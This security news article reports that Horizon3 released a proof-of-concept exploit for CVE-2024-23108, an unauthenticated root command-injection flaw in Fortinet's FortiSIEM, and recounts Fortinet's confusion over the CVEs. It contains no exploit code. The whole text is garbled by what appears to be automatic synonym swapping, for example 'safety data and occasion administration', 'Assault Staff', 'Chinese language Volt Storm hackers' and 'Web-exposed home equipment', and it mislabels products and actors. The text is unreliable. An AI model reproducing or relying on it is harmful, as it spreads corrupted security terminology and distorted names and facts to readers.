Safety researchers have launched a proof-of-concept (PoC) exploit for a maximum-severity vulnerability in Fortinet’s safety data and occasion administration (SIEM) resolution, which was patched in February.
Tracked as CVE-2024-23108, this safety flaw is a command injection vulnerability found and reported by Horizon3 vulnerability professional Zach Hanley that allows distant command execution as root with out requiring authentication.
“Multiple improper neutralization of special elements used in an OS Command vulnerability [CWE-78] in FortiSIEM supervisor may allow a remote unauthenticated attacker to execute unauthorized commands via crafted API requests,” Fortinet says.
CVE-2024-23108 impacts FortiClient FortiSIEM variations 6.4.0 and better and was patched by the corporate on February 8, along with a second RCE vulnerability (CVE-2024-23109) with a ten/10 severity rating.
After first denying that the 2 CVEs have been actual and claiming they have been really duplicates of the same flaw (CVE-2023-34992) mounted in October, Fortinet additionally mentioned the disclosure of the CVEs was “a system-level error” as a result of they have been mistakenly generated resulting from an API concern.
Nevertheless, the corporate ultimately confirmed they have been each CVE-2023-34992 variants with the identical description as the unique vulnerability.
On Tuesday, over three months after Fortinet launched safety updates to patch this safety flaw, Horizon3’s Assault Staff shared a proof-of-concept (PoC) exploit and printed a technical deep-dive.
“While the patches for the original PSIRT issue, FG-IR-23-130, attempted to escape user-controlled inputs at this layer by adding the wrapShellToken() utility, there exists a second order command injection when certain parameters to datastore.py are sent,” Hanley mentioned.
“Attempts to exploit CVE-2024-23108 will leave a log message containing a failed command with datastore.py nfs test.”
The PoC exploit launched in the present day by Horizon3 helps execute instructions as root on any Web-exposed and unpatched FortiSIEM home equipment.
Horizon3’s Assault Staff additionally launched a PoC exploit for a vital flaw in Fortinet’s FortiClient Enterprise Administration Server (EMS) software program, which is now actively exploited in assaults.
Fortinet vulnerabilities are continuously exploited—usually as zero-days—in ransomware and cyber espionage assaults concentrating on company and authorities networks.
As an illustration, the corporate revealed in February that Chinese language Volt Storm hackers used two FortiOS SSL VPN flaws (CVE-2022-42475 and CVE-2023-27997) to deploy the Coathanger distant entry trojan (RAT), a malware pressure that was additionally not too long ago used to backdoor a army community of the Dutch Ministry of Defence.
